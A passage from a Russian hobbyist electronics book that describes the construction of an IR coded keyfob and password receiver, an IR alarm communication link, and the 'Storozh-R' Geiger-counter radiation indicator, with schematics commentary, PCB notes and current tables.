Рис. 47. Осциллограмма кода «111011100111001»
Правильно собранный генератор наладки не требует. Проконтролировать его работу можно с помощью осциллографа, подключив его вход к коллектору транзистора VT1. После включения SA1 и нажатия кнопки SB1 на экране осциллографа (время ждущей развертки 20...30 мс) должна возникнуть и исчезнуть последовательность импульсов, расставленных во времени в соответствии с закоммутированным сигналом. Если это рассмотренный выше код 111011100111001, то ему будет соответствовать осциллограмма, изображенная на рис. 47 («лишний» импульс ,в начале пакета - стартовый). По амплитуде импульсов, измеренных на резисторе R9, можно судить о токе в ИК диоде Iимп@Uимп /R9 (Iимп - в амперах, Uимп - в вольтах, R9 - в омах), а в быстрой развертке (20...50 мкс, тоже ждущей) - об их форме и длительности, которая должна быть в пределах 5...15 мкс.
Двухступенчатое включение кодового излучателя - сначала выключателем SA1, а затем кнопкой SB1 - связано с особенностью самовозбуждения кварцованных генераторов, с их довольно медленным (из-за высокой добротности кварцевого резонатора) вхождением в рабочий режим.
Рис. 48. Вариант включения генератора
Выключатель SA1 можно исключить, организовав питание генератора так, как показано на рис. 48. Но в таком случае кнопку SB1 потребуется нажимать дважды: первое нажатие даст, скорее всего, неверную комбинацию (которая, кстати, может быть даже полезна как маскирующая истинный код). Без выключателя SA1 можно обойтись и в том случае, если в качестве источника питания генератора будет взята низковольтная батарея достаточной емкости, способная обеспечить продолжительную его работу при постоянно включенных микросхемах. Например, литиевый элемент с ЭДС=3 В, имеющий электрическую емкость 0,1 А·ч, сможет проработать в таком режиме около года.
Таблица 10
Uпит, В |
Iпотр, мкА |
Iимп, А |
2,4 |
5 |
0,18 |
3,7 |
16 |
0,38 |
4,3 |
30 |
0,38 |
5,0 |
60 |
0,46 |
6.0 |
140 |
0,59 |
7,0 |
360 |
0,72 |
В кодовом излучателе могут быть использованы практически любые ИК диоды, ограничения - лишь габаритные: высота деталей на печатной плате не должна превышать 8 мм. Все резисторы здесь типа МЛТ-0,125, неэлектролитические конденсаторы - КМ-5, КМ-6, К10-17Б и др. Конденсатор С4 - типа К50-35 или К50-40. Рабочее напряжение конденсатора С6 (CE-DS Магсоп, его монтируют в положении «лежа») должно соответствовать напряжению источника питания. В варианте, показанном на рис. 48, необходимо предварительно проконтролировать состояние его диэлектрика: ток утечки в С6 должен быть меньше 1 мкА. При увеличении сопротивления резистора R9, ограничивающего ток в ИК диоде, емкость конденсатора С6 может быть соответственно уменьшена. Довольно большая «дальнобойность» ИК излучателя (с R9=3,9 Ом превышающая 10 м) может оказаться просто ненужной.
Кодовый генератор сохраняет свою работоспособность в широком диапазоне питающих напряжений. В таблице 10 показана зависимость потребляемого им тока Iпотр и тока в ИК диоде Iимп от напряжения источника питания Uпит.
ИК приемник «электронного пароля» с дешифратором
Принципиальная схема устройства, принимающего кодированный ИК сигнал брелка-генератора, показана на рис. 49.
Микросхема DA1, представляющая собой фотоусилитель, преобразует импульсы тока в фотодиоде BL1, возбуждаемые ИК вспышками брелка-излучателя, в импульсы напряжения, пригодные для прямого их введения в цифровой анализатор. На рис. 50, а показана импульсная последовательность на выходе фотоусилителя, соответствующая коду 111011100111001, который мы здесь и ниже будем рассматривать в качестве примера.
В приемнике два формирователя. Один из них, выполненный на элементах DD1.1 и DD3.1, расширяет каждый из поступающих импульсов (напомним: их длительность - около 10 мкс) до tф1@R3·C5@0,6...0,8 мс (должно быть выполнено условие: 0,5·tзн<tф1<tзн где tзн=0,976 мс - длительность знакоместа в кодированном сигнале; см. рис. 50, а, б). А второй, собранный на элементах DD1.2 и DD3.3, формирует импульс длительностью tф2@R4·C6=30...50 мс (должно быть: tф2 >16 tзн; см. рис. 50, г). По фронту этого импульса на выходе элемента DD3.5 формируется короткий импульс (tr @R5·C7@10 мкс), устанавливающий сдвигающий регистр DD4-DD5 и счетчик DD6 в нулевое состояние (рис. 50, д).
Элементы DD1.3, DD1.4, R7, ZQ1 образуют задающий генератор, работающий на частоте кварцевого резонатора ZQ1 - 32768 Гц (задающий генератор ИК излучателя, напомним, работает на этой же частоте).
Принимаемый сигнал (или помеха) фиксируется в сдвигающем регистре DD4-DD5 следующим образом. Фронтом первой же ИК вспышки все запоминающие элементы устройства переключаются
Рис. 49. ИК приемник «электронного пароля»
Рис. 50. Эпюры сигналов для кода «111011100111001»
в нулевое состояние (на выходах микросхем DD4-DD6 устанавливаются нули) и счетчик DD6 начинает счет. Примерно через 0,5 мс (tзн/2) нуль на выходе 2^4 (выв. 5) счетчика DD6 будет замещен единицей. В сдвигающем регистре К561ИР2 изменение напряжения на входе С вида J приводит к перемещению хранящегося в нем числа на один разряд в сторону старших (на рис. 49 - вниз), а в младший разряд регистра DD4 будет вписано то значение, которое в этот момент окажется на его входе D (выв. 7). Это может быть и 1 - расширенный до tф1 «единичный» импульс, и 0 - если ИК вспышка в этом знакоместе кодовой посылки отсутствовала. Следующий сдвиг числа произойдет через tзн=0,976 мс - «шаг», который сохранится в дальнейшем.
Система сделает лишь 16 поразрядных сдвигов (сдвигающие импульсы, генерируемые счетчиком DD6, показаны на рис. 50, в) - с появлением единицы на выходе 29 счетчика DD6 и, соответственно, нуля на входе DD2.2 (выв. 9), счетчик самозаблокируется и останется в этом состоянии до очередного старта системы.
Таким образом принятая последовательность И К вспышек преобразуется в число, хранящееся в регистре DD4-DD5. Остается выяснить - является ли оно кодовым.
Осуществляется это диодно-резисторным дешифратором Д1, схему которого (для того же кода 111011100111001) иллюстрирует рис. 51. Идея дешифрации проста. Все выходы регистра, на которых в соответствии с кодовой комбинацией должна быть единица, подключают к входам диодно-резисторного конъюнктора (VD1,VD4- VD6, VD9-VD11, VD13-VD15, R1), а выходы, на которых должен
Рис. 51. Дешифратор для кода «111011100111001»
быть нуль, — к входам диоднорезисторного дизъюнктора (VD2, VD3, VD7, VD8, VD12, R2). Если в регистре зафиксировано число- код, то на выходе конъюнктора установится напряжение высокого уровня - 1, а Выходе диэъюнктора - низкого - 0. И только в этом случае на выходе ИК приемника возникнет сигнал 1. Это «единичное» его состояние продержится до тех пор, пока не будет нажата кнопка SB1 «Сброс» (параллельно ей может быть включено несколько кнопок такого же назначения) или по каналу не пройдет какой-либо посторонний сигнал*.
Приемник смонтирован на плате размером 83х54 мм, выполненной из двустороннего фольгированного стеклотекстолита толщиной 1,5 мм (рис. 52). Технология изготовления платы и приемы монтажа деталей на ней те же, что и при изготовлении платы брелка-генератора.
Особое внимание при монтаже приемника следует обратить на электрическую экранировку фотоголовки (BL1, DA1 и др.): обладая высокой чувствительностью и значительной широкополосностью, она подвержена воздействию электрических сигналов самого разного происхождения. Экран можно изготовить из жести, его раскрой показан на рис. 53: по штриховым линиям сгибают коробку, пропаивают ее в углах, выравнивают низ и установив так, как показано штрих-пунктиром на рис. 52, припаивают в двух-трех точках к нуль-фольге. При необходимости усиление фотоголовки можно уменьшить, зашунтировав вход микросхемы DA1 резистором сопротивлением R1=0,3...З МОм.
Рис. 52. Печатная плата ИК приемника «электронного пароля»
Все резисторы в приемнике - типа МЛТ-0,125. Габариты конденсаторов С4 и С10 - Ж8х12 мм. Конденсатор С2 - типа К53-30, остальные - КМ-6, К10-176 и КД. Габариты кварцевого резонатора - Ж2х6 мм.
На плате выделено место для размещения элементов описанного выше (см. рис. 43, а) звукового генератора. На рис. 52 оно оконтурено штрих-пунктиром.
Необходимо принять меры по ослаблению засветки фотодиода посторонними источниками света, способными существенно
Рис. 53. Выкройка экрана фотоусилителя
уменьшить чувствительность фотоприемника. Фотодиод можно поместить в «колодец», склеенный из черного полистирола, который защитит его от воздействия источников, расположенных в стороне от оптической оси. К тому же образующийся невидимый «коридор», в пределах которого только и будет возможен оптический контакт приемника с брелком-излучателем, умножит и без того немалые трудности информационного «взлома» системы.
Окно фотодиода полезно заклеить пленкой, ослабляющей по преимуществу видимый свет. Тем более, что расстояние, на котором приемник способен обнаружить и дешифровать ИК вспышки брелка, в не слишком плохих условиях превышает 10 м. В чем, чаще всего, нет никакой необходимости.
К выходу приемника (выв. 12 элемента DD3.6) могут быть подключены самые разные сигнальные устройства. Например, светодиод, показанный на рис. 49 штриховым контуром, или звуковой генератор, оповещающие о появлении «своего». Но если по сигналу приемника охранная система должна принять решение самостоятельно (включить, например, привод электрозамка), то в электронный ключ, управляющий исполнительным механизмом (ИМ), нужно ввести задержку. Так, например, как это показано на рис. 54. Запаздывание включения ИМ зависит здесь от постоянной времени R2C1 и может составить несколько десятых долей секунды. Длительность задержки увеличится еще, если в эмиттерную цепь транзистора VT1 включить диод VD3, рассчитанный на рабочий ток ИМ, например, КД213А. Напряжение питания ИМ, с учетом возникающих при его выключении экстранапряжений (диод VD2 при индуктивных нагрузках обязателен), не должно превышать максимально допустимого для транзистора VT1 (60 В - для КТ972А, 45 В - для КТ972Б). Рабочий ток исполнительного механизма не должен превышать здесь 2 А.
Рис. 54. Электронный ключ с задержкой
Задержка срабатывания исполнительного механизма - эффективное средство в борьбе с попытками выяснить подбором задействованный в системе код. В принятой здесь системе кодирования даже секундная задержка заставит злоумышленника простоять у чужих дверей не один час. И это - при наличии у него соответствующей аппаратуры, знания принципов кодирования и время-импульсных характеристик ИК излучения. «Подсмотреть» же работу ИК брелкагенератора, не войдя в визуальный контакт с его владельцем, несравненно сложнее, нежели это допускают кодовые генераторы, работающие в радиодиапазоне.
Приемник сохраняет работоспособность при снижении напряжения питания до 4 В, потребляемый им ток не превышает 1,4 мА.
*) Заметим, что дешифратору безразлично состоянием старшего разряда регистра DD5, поскольку по окончании записи на его выв. 2 обязательно окажется 1 - стартовый бит кодовой комбинации или первый бит помехи.
ИК линия связи в охранной системе
Большие помехи в радиоэфире, легкость обнаружения переданного по радио и последующей его имитации, административно-финансовые препятствия, созданные перед каждым желающим воспользоваться радиоканалом в своей охранной системе (ОС)*, заставляют искать здесь какие-то иные средства связи. С появлением полупроводниковых излучателей, способных генерировать мощные ИК вспышки, и фотодиодов с встроенной оптикой инфракрасный диапазон стал представлять интерес и в этом отношении.
В линии связи, работающей в системе охранной сигнализации, должны, очевидно, по-разному представляться три возможные ситуации: а) на охраняемом объекте нарушений нет; б) объект передает сигнал тревоги; в) «обрыв» в канале связи.
*) В России передачу сигналов охранных систем по радио разрешено вести лишь в двух частотных каналах (см. с. 10). Это - для всех нас. Напомним, что в особом состоянии ионосферы, на так называемом «проходе», помеху, блокирующую радиоканал, может вызвать не только сигнал соседа, находящегося «лишь» в 5...10 км, но и радиопередатчик, удаленный на 1.5...2 тысячи километров.
Передатчик в ИК линии связи
Его принципиальная схема приведена на рис. 55. Здесь DD1.1, DD1.2, R3, ZQ1 - тактовый генератор, возбуждающийся на частоте кварцевого резонатора fр=32768 Гц. DD3 - счетчик, на выходе 11 (выв. 15) которого формируется 16-герцовый меандр (f11=fр/2^11), а на выходе 14 (выв. 3) - 2-герцовый (f14=fр/2^14). Элементы DD2.1- DD2.4 образуют переключатель, на выходе которого (выход DD2.4) возникает 2-герцовый или 16-герцовый меандр в зависимости от уровня напряжения на входе 5 элемента DD2.1*.
Из фронта меандра дифференцирующая цепочка R5C3 и импульсный усилитель DD1.4-DD1.6 формируют в базе нормально запертого транзистора VT1 импульс тока длительностью tи@10 мкс (tи@R5·C3). Возникающий в цепи коллектора транзистора VT1 ток возбуждает ИК диод BI1 ив пространство излучается короткая ИК вспышка.
Итак, ИК передатчик всегда что-то излучает - либо редкие, 2-герцовые импульсы, если оснований для тревоги нет, либо частые,
16-герцовые - тревожные.
Рис. 55. Передатчик ИК линии связи
Рис. 56. Печатная плата передатчика
На рис. 56 показана печатная плата передатчика, которую изготавливают из двухстороннего фольгированного стеклотекстолита толщиной 1,5 мм. Фольга со стороны деталей используется лишь в качестве нулевого провода-«земли»; в местах пропуска проводников в ней вытравлены фрагменты той или иной конфигурации. Место пайки к нуль-фольге «заземляемого» вывода резистора, конденсатора и др. показано зачерненным квадратом; соединение с ней вывода микросхемы или проволочной перемычки - квадратом со светлой точкой в центре.
В центре платы сверлят отверстие под ИК диод, его выводы припаивают к соответствующим уширениям на печатных проводниках внакладку.
Все резисторы ИК передатчика - типа МЛТ-0,125. Конденсаторы: С1, С2, С5 - КМ-6 (выводы в одну сторону); С4 - К50-6; С6 - TOWA или другой, диаметром не более 10 мм; СЗ - КМ-5 (выводы в разные стороны).
Имеющиеся в продаже ИК диоды предназначены для работы в устройствах дистанционного управления бытовыми радиоаппаратами и обычно имеют довольно широкий - до 30...400 - лепесток излучения. Для увеличения «дальнобойности» такого излучателя в него нужно ввести линзу-конденсор. Так, как показано на рис. 57. Здесь: 1 - печатная плата передатчика; 2 - ИК-диод; 3 - корпус передатчика (ударопрочный полистирол толщиной 2...2,5 мм); 4 - обойма стандартной 5-кратной часовой лупы (на ней должен быть значок «х5»); 5 - ее линза.
Рис.57. Корпус с линзой- концентратором
Лупу приклеивают к передней стенке корпуса (клей - распущенные в растворителе 647 или RS-2 кусочки полистирола; им же клеят и сам корпус), в которой сделано отверстие диаметром 30...35 мм. При указанном на чертеже расстоянии между основанием лупы и печатной платой ИК диод оказывается в фокусе ее линзы, его излучение сжимается в узкий луч и освещенность окна фотоприемника на другом конце ИК линии связи многократно увеличивается.
Важнейшим параметром ИК передатчика, как и любого элемента охранной техники, является его энергопотребление в дежурном режиме. В таблице 11 показана зависимость потребляемого им тока Iпотр от напряжения источника питания Uпит. В режиме передачи тревожного сигнала Iпотр увеличивается примерно на 10%.
Невысокое общее энергопотребление позволяет ввести резервный источник питания непосредственно в корпус ИК передатчика без увеличения его габаритов. Это может быть, например, 6-вольтная батарея типа 11А (Ж10,3х16 мм, емкость 33 мА·ч) или 476А (Ж13х25 мм, емкость 105 мА·ч). Показанная в таблице 11 зависимость тока в ИК диоде Iимп от напряжения питания позволяет судить о мощности ИК вспышек, излучаемых передатчиком, и, соответственно, о его «дальнобойности».
Таблица 11
Uпит ,B |
Iпотр, мА |
Iимп, А |
4,2 |
0,20 |
0,36 |
5,0 |
0,40 |
0,46 |
6.0 |
0,77 |
0,64 |
7,0 |
1,30 |
0,82 |
8,0 |
1,90 |
0,97 |
9,0 |
2,70 |
1.23 |
10,0 |
3,60 |
1,38 |
Размещая передатчик, нужно помнить об очень узкой диаграмме его излучения. Узел крепления должен позволить точную наводку передатчика и жесткую его фиксацию в лучшем положении. Можно воспользоваться, например, шарнирной головкой от фотоаппарата или кинокамеры, установив ее на стене, раме окна и т.п. Или выполнить этот узел в виде двух латунных пятачков, соединенных отожженной медной
Рис. 58. Узел крепления передатчика
проволокой диаметром 2...2,5 мм (рис. 58). Один из пятачков крепят винтами к боковой стенке излучателя (резьба - в стенке), другой - шурупами к опоре. Проволоку сгибают так, чтобы излучатель занял нужное положение. Во избежание значительных вибраций она должна быть возможно более короткой.
Испытания показали, что при Uпит=6 В передатчик способен обеспечить связь на расстоянии r@70 метров (с отоприемником, описание которого приведено ниже). Но это не предел. Зависимость r от Iимп при прочих равных условиях имеет вид: г@к·ЦIимп , где к - коэффициент, учитывающий «Прочие условия». Таким образом, при Uпит =10 В r@100 м. Ток в ИК диоде может быть увеличен и за счет сопротивления резистора R7: Iимп=[Uпит-4] /R7 (Iимп - в амперах, Uпит - в вольтах, R7 - в омах). Но делать это нужно с осторожностью: в любом сочетании Uпит и R7 амплитуда тока в ИК диоде не должна превышать предельно допустимую (см. приложение 3).
Значительное увеличение яркости ИК вспышки можно получить, перестроив «сильноточную» часть импульсного усилителя так, как показано на рис. 59 (печатная плата - на рис. 60, а, б). В этом случае может быть достигнут ток в импульсе Iимп=10 А - допустимый для ИК диода типа АЛ123А. Резистор R4 - самодельный, отмеренный по цифровому омметру или вычисленный (см. приложение 8) отрезок нихромовой, константановой или манганиновой проволоки.
Рис. 59. Головка излучателя с ИК диодом АЛ123А
Рис. 60. Печатная плата головки мощного ИК излучателя
Амплитуду и форму тока, возбуждающего ИК диод, можно проконтролировать осциллографом, подключив его к резистору R4.
Излучающую головку можно выполнить в виде отдельного блока во «всепогодном» исполнении. Все остальные элементы ИК излучателя могут войти в электронную часть охранной системы в качестве ее фрагмента, связанного с ИК головкой лишь тонким трехпроводным кабелем.
Рис. 61. Приемник ИК линии связи
*) Выделенное на рисунке штрих-пунктиром - пример датчика охранной системы, формирующего на своем выходе нужный сигнал.
Приемнике ИК линии связи
Принципиальная схема приемника в ИК линии связи приведена на рис. 61. Здесь DA1 - усилитель-формирователь, преобразующий ИК вспышку, освещающую фотодиод BL1, в импульс напряжения с амплитудой U10@Uc4 (эпюра 1 на рис. 62). Одновибратор, выполненный на элементах DD1.1, DD2.1 и др., расширяет этот импульс* до tф1@R2·C5@15 мс (эпюра 2 на рис. 62) для задержки его спада (1) на входе С счетчика DD3 и формирования «щелчка» длительностью tф1, в звуковом генераторе, выполненном на DD2.5, DD2.6, BF1 и др.
Одновибратор DD1.3, DD2.3 и др. формирует импульс длительностью tф2@R4·C6@1,5 с (эпюра 3 на рис. 62), разрешающий беспрепятственный подсчет импульсов в DD3 лишь на этом временном интервале.
Приемник активизируется фронтом первой же ИК вспышки. Из него формируется короткий (tr@R6-C7) импульс на входе R счетчика DD3 (эпюра 4 на рис. 62), устанавливающий счетчик в предстартовое состояние (ему соответствует 0 - напряжение низкого уровня - на всех его выходах), а спадом импульса длительностью tф1
Рис. 62. Эпюры сигналов
в счетчик записывается первая единица. Если на фотоприемник поступают импульсы, следующие с частотой 2 Гц (с такой частотой, напомним, следуют ИК вспышки, если датчики на охраняемом объекте не потревожены), то на выходе 4 (выв. 5) счетчика DD3 сохраняется 0, так как фронтом четвертого импульса (он появится через 0,5х4=2 с - по окончании разрешающего счет интервала tф2 =1,5 с) счетчик DD3 будет возвращен в исходное состояние.
По иному ведет себя приемник, если на него приходят ИК импульсы, период следования которых равен 62,5 мс, т.е. - сигнал тревоги. Поскольку 62,5х4=250 мс < tф2-1,5 с, то четвертый импульс переведет счетчик DD3 в состояние «4» (000100; на его выводе 5 появляется 1 - напряжение, близкое к напряжению питания), счетчик в этом состоянии самозаблокируется (сигнал 1 на входе 8 элемента DD1.2 делает его нечувствительным к сигналам на входе 9), а включившийся красный светодиод HL1 и 16-герцовые щелчки звукового генератора доведут сигнал тревоги до окружающих (эпюры 5 и 6 на рис. 62). Это будет продолжаться примерно 1,25 с (tф2 -0,25), после чего возникнет 0,25-секундная пауза и тревожная сигнализация повторится.
При обрыве связи приемник ведет себя иначе. Если на временном интервале tобр (tобр=R11·C8) приемник не обнаруживает ИК вспышки, конденсатор С8 разряжается по цепи VD6, R11, DD2.3, транзистор VT1 открывается до насыщения, напряжение на резисторе R8 увеличивается с -О В почти до напряжения питания, на выходе DD 1.4 устанавливается напряжение низкого уровня и звуковой генератор начинает излучать монотонный сигнал с частотой fтон@1/2R14·C9. С появлением первой же ИК вспышки конденсатор С8 быстро заряжается по цепи R10, VD5, тональное излучение прекращается и приемник приступает к анализу поступающих сигналов.
Печатную плату приемника изготавливают из двустороннего фольгированного стеклотекстолита 50х50 мм толщиной 1,5 мм (рис. 63) подобно тому, как это сделано в ИК передатчике.
Фотоголовку ИК приемника (BL1, DA1 и др.), обладающую высокой чувствительностью к электрическим наводкам в широком спектре частот, необходимо экранировать. Экран изготавливают из жести, его выкройка показана на рис. 64. Штриховые линии здесь - места сгибов. Согнутый экран пропаивают в углах, выравнивают его низ и, установив в нужном положении
Рис. 63. Печатная плата приемника
на нуль-фольгу (на плате оно показано штриховой линией), припаивают к ней в двух-трех точках.
Конструктивно ИК приемник может быть выполнен так, как показано на рис. 65. Здесь: 1 - корпус приемника (черный полистирол толщиной 2...2,5 мм); 2 - обойма 7-кратной ручной лупы (ручка срезана); 3 - ее линза; 4 - печатная плата; 5 - экран фотоголовки;
6 - фотодиод ФД 263-01. Обойму лупы приклеивают к передней стенке корпуса, имеющей отверстие диаметром 35 мм (клей — распущенные в растворителе 647 или в RS-2 кусочки полистирола).
Расстояние между стоящими соосно фотодиодом и линзой должно быть близко к ее фокусному расстоянию. Это сконцентрирует
Рис. 65. Конструкция приемника
поступающий световой поток на фотодиоде и значительно увеличит чувствительность фотоприемника к слабым сигналам**.
К узлу крепления приемника предъявляются те же требования, что и к креплению передатчика: должна быть обеспечена удобная его наводка и надежная фиксация в лучшем положении.
Если по условиям связи ИК приемник должен быть вынесен на улицу (для связи, например, с автомобилем, стоящим у торца дома, или с квартирой на другом его конце), то его лучше составить их двух частей: внешней, во влагозащитный корпус-бленду которой помещают лишь объектив и фртоголовку, и внутренней - со всем остальным. Эти части связывают тонким трехпроводным кабелем («+», «-», выв. 10 микросхемы DA1).
Приемник может быть дополнен акустическим излучателем большей мощности, например, динамической головкой, включенной так, как показано на рис. 66, или пьезосиреной ACT-10 (рис. 67), сохраняющей достаточную мощность и при пониженном напряжении питания.
Как показали предварительные испытания, протяженность ИК линии связи с описанными здесь ИК приемником и передатчиком достигает 70 метров. Существенное ее увеличение может дать переход
В ИК приемнике важнее диаметр объектива. С его увеличением увеличивается освещенность р-п перехода фотодиода и, соответственно, расстояние, с которого может быть зафиксирована ИК вспышка излучателя.
Рис. 66. Динамическая головка в акустическом излучателе
Рис. 67. Пьезосиренав акустическом излучателе
на настраиваемую оптику - если вместо неподвижной линзы с ее приблизительной фокусировкой использовать объектив от старого фотоаппарата с наводкой на резкость по расстоянию, «Дальнобойность» передатчика может быть увеличена еще в 1,5...2 раза и более за счет увеличения яркости ИК вспышки.
С другой стороны, в линиях связи, не превышающих 20...25 м (автомобиль или «ракушка» под окнами 3...4-этажного дома, окно дома на другой стороне улицы и т.п.), оптика может не потребоваться вообще, во всяком случае - в ИК приемнике.
*) Напомним, что при умеренной засветке длительность этого импульса близка к длительности самой ИК вспышки. При интенсивной, от близко расположенного излучателя, например, она может увеличиться в 3...5 раз и более из-за относительно медленного «рассасывания» зарядов в р-n переходе фотодиода.
**) Угол расхождения лучей в объективе ИК передатчика, его так называемая апертура, должен соответствовать лепестку ИК диода (см. углы излучения ИК диодов в приложении 3). Тогда объектив «соберет» все его излучение.
ОСТОРОЖНО - РАДИАЦИЯ!
Ионизирующая радиация опасна не только своей высокой поражающей способностью - доза, смертельно опасная для человека, в тепловом ее эквиваленте едва нагрела бы и стакан воды, но и тем, что она никак не воспринимается нашими органами чувств. Ни один из органорецепторов человека не предупредит его о сближении с источником радиации любой интенсивности.
Это обстоятельство позволяло долгое время скрывать от населения происходившие в нашей стране радиационные аварии и их последствия. И даже после взрыва на Чернобыльской АЭС, радиоизотопный след которого ощутила, как минимум, вся Европа, еще несколько лет у нас блокировались любые попытки дать в руки населения приборы, которые позволили бы ему самому позаботиться о своей безопасности. И лишь с появлением* в свободной продаже датчиков ионизирующей радиации - так называемых счетчиков Гейгера - управлявшие нашей страной утеряли, наконец, исключительное право знать то, что не следует, по их мнению, знать населению...
«Сторож-Р» - прибор непрерывного радиационного контроля
На техногенное загрязнение окружающей среды нередко смотрят как на неизбежную «плату» за те удобства цивилизованной жизни, которые нам предоставляет научно-технический прогресс. Но если о загрязнениях, хоть как-то себя проявляющих, мы можем судить и сами, можем так или иначе минимизировать их воздействие на себя, то по отношению к веществам, полям, средам, недоступным нашим органам чувств, мы оказываемся в ином положении: не только предпринимать какие-либо меры самозащиты, но и просто узнать о появлении такой опасности, даже длительном ее существовании мы не можем.
В таких случаях остается целиком и полностью полагаться на те или иные службы централизованного контроля, сознавая, что по самому характеру своей деятельности, по физическим своим возможностям они в лучшем случае будут следить лишь за среднестатистическим благополучием каждого из нас и его соответствием нормам своих ведомств.
Все это в полной мере относится и к радиационному загрязнению окружающей среды - к радиоизотопам, к их проникающему излучению: невидимому, неслышимому, неосязаемому, не обладающему ни запахом, ни вкусом даже в безусловно недопустимых дозах. Правда, монопольное право на радиационный контроль в нашей стране ведомственные службы недавно утеряли - у населения появились персональные дозиметры.
Но «измерение опасности» - этой первоосновы ведомственного контроля, пришедшей к нам вместе с персональными дозиметрами (в большинстве своем - упрощенными моделями профессиональных), - лишь на первый взгляд кажется чем-то вполне заменяющим органолептический контроль. В том, что ни один из органов чувств человека не может быть отнесен к категории измеряющих, можно, конечно, видеть лишь ни к чему не обязывающие нас особенности эволюции живого. Но то, что потеря любого из них не компенсируется даже самым совершенным произведением нынешней электронной техники, заставляет отнестись к органолептической ориентации - к самой ее идеологии, ее шкале ценностей - с должным вниманием. Как, соответственно, и к приборам, способным подобным же образом ориентировать человека в потенциально опасных для него новых средах.
Техника персональной ориентации человека в продуктах и отходах современной цивилизации призвана решать задачи, непосильные для специалистов-профессионалов, независимо от их числа, квалификации и оснащения. Всегда - как это неизменно выяснялось - недостаточных.
Но какими же могут быть функции у приборов «органолептического» контроля радиационной обстановки? Чем, собственно, они должны отличаться от обычных дозиметров? И вообще - располагаем ли мы для этого достаточными средствами?
Органолептический прибор радиационного контроля - радиационный технорецептор - отличается от дозиметрического прежде всего своим назначением: он обязан своевременно поставить в известность своего владельца о его сближении с источником радиации, о появлении пока еще потенциальной для него опасности.
Техническое обеспечение такого режима работы прибора сказывается почти на всех его параметрах. Так, если энергоэкономичность дозиметра является для него показателем достаточно второстепенным, то для технорецептора он - из важнейших: прибор, не способный работать непрерывно, требующий постоянной заботы о своем энергообеспечении, вообще не может быть отнесен к этой категории. С другой стороны, почти теряет смысл вопрос о точности технорецептора. Во всяком случае в выборе между возможностью «видеть» широкий спектр радиационных излучений и точностью количественной оценки только какой-то его разновидности - лишь гамма-излучения, например, - безусловный приоритет будет иметь спектральная широкополосность прибора.
Различаются эти приборы и по форме представления информации. Радиационный технорецептор должен включать ее в рецепторное пространство человека. То есть, он должен обладать способностью информировать своего владельца о радиационной обстановке и ее изменении без какого-либо запроса с его стороны. Обычные в измерительной технике табло и шкалы здесь, очевидно, ничем помочь не могут.
Рис. 68. Радиационный индикатор «Сторож-Р»
Особые требования предъявляются и к надежности технорецептора. Она должна быть не только высокой, но и постоянно проверяемой - отказ прибора должен обнаруживаться незамедлительно.
Органолептический прибор радиационного контроля должен обладать и высокой радиационной чувствительностью, во всяком случае - быть способным контролировать естественный радиационный фон и практически мгновенно реагировать на сколько-нибудь заметные его изменения.
И, наконец, все это мало бы чего стоило, если бы стоило дорого...
С учетом вышеизложенного и был спроектирован «Сторож-Р» - сторож радиационный - прибор непрерывного радиационного контроля.
Его основные параметры:
Спектр контролируемых излучении
|
b(>0,5 МэВ), g(>0,05 МэВ)
|
Реакция на естественный радиационный фон (ЕРФ)
|
акустические импульсы- щелчки, следующие со средней частотой 15...25 имп/мин;
|
Реакция на изменение уровня радиации
|
изменение скорости счета (линейная зависимость);
|
Порог тревожной сигнализации
|
4...5 ЕРФ
|
Напряжение источника питания
|
9 В
|
Потребляемый ток: в фоновых радиационных полях
|
0,15...0,2 мА 3...4 мА |
Время непрерывной работы (с батареей «Корунд») |
> 5000 часов
|
Время выхода на рабочий режим
|
<1c
|
Габариты прибора
|
120х46х21 мм
|
Масса прибора (с источником питания)
|
100 г
|
Принципиальная схема прибора показана на рис. 68. В качестве датчика ионизирующей радиации BD1 используется счетчик Гейгера типа СБМ20*. Высокое, напряжение на его аноде формирует блокинг-генератор: импульсы напряжения с повышающей обмотки I трансформатора Т1 через диоды VD1, VD2 заряжают конденсатор фильтра С1. Нагрузкой счетчика служит резистор R1 и элементы, связанные с входом 8 микросхемы DD1.
На элементах DD1.1, DD1.2, СЗ и R4 собран одновибратор, преобразующий импульс, поступающий со счетчика Гейгера и имеющий затянутый спад, в «прямоугольный», длительностью 5...7 мс.
Фрагмент схемы, включающий в себя элементы DD1.3, DD1.4, С4 и R5, представляет собой управляемый по входу 6 DD1 звуковой генератор, возбуждающийся на частоте F@1/2·R5·C4@1 кГц, к парафазному выходу которого (выходы 3 и 4 DD1) подключен пьезоизлучатель НА1. Акустический импульс-щелчок возбуждается в нем «пачкой» электрических импульсов.
На элементах VD4, R8...R10, С8 и С9 собран интегратор, управляющий работой порогового усилителя, выполненного на микросхеме DD2.
Рис. 69. Печатная плата «Сторожа-Р»
Напряжение на конденсаторе С9 зависит от средней частоты возбуждения счетчика Гейгера; по достижении им потенциала отпирания полевого транзистора, входящего в DD2, включается светодиод HL1: частота и длительность его вспышек будут расти с увеличением уровня радиации.
Прибор монтируют на печатной плате, изготовленной из двустороннего стеклотекстолита толщиной 1,5 мм (рис. 69, а). Фольга обратной стороны используется лишь в качестве нулевой шины (она соединена с «-» источника питания), в местах пропуска проводников в ней вытравлены кружки диаметром 1,5...2 мм.
Двухцокольный счетчик СБМ20 крепят на печатной плате жесткими скобками (стальная проволока диаметром 0,8...0,9 мм). Их надевают внатяг на выводы счетчика и впаивают в предназначенные для них отверстия. Счетчик с мягкими выводами (другое оформление счетчика СБМ20) крепят за корпус охватывающими его тонкими скобками (монтажный провод диаметром 0,4...0,6 мм), отверстия для их распайки - «а-б» и «в-г».
Трансформатор Т1 наматывают на кольцевом сердечнике М3000НМ типоразмера К16х10х4,5 мм. Острые ребра сердечника предварительно заглаживают шкуркой и покрывают весь сердечник электрически и механически прочной изоляцией, например, обматывают лавсановой или фторопластовой лентой.
Первой наматывают обмотку I, она содержит 420 витков Провода ПЭВ-2-0,07. Обмотку ведут почти виток к витку, в одну сторону, оставляя между ее началом и концом промежуток в 1...2 мм. Обмотку I также покрывают изоляцией. Далее наматывают обмотку II-8 витков провода диаметром 0,15...0,2 мм в произвольной изоляции, и поверх нее - обмотку III - 3 витка тем же проводом. Эти обмотки также должны быть распределены по сердечнику возможно равномернее. Расположение обмоток и их выводов должно соответствовать рисунку печатной платы, а их фазировка - указанной на принципиальной схеме (синфазные концы обмоток обозначены точками).
Готовый трансформатор рекомендуется покрыть слоем гидроизоляции - обмотать, например, узкой полоской липкой пластиковой ленты. На плату трансформатор крепят винтом МЗ между двумя эластичными, не продавливающими обмоток, шайбами.
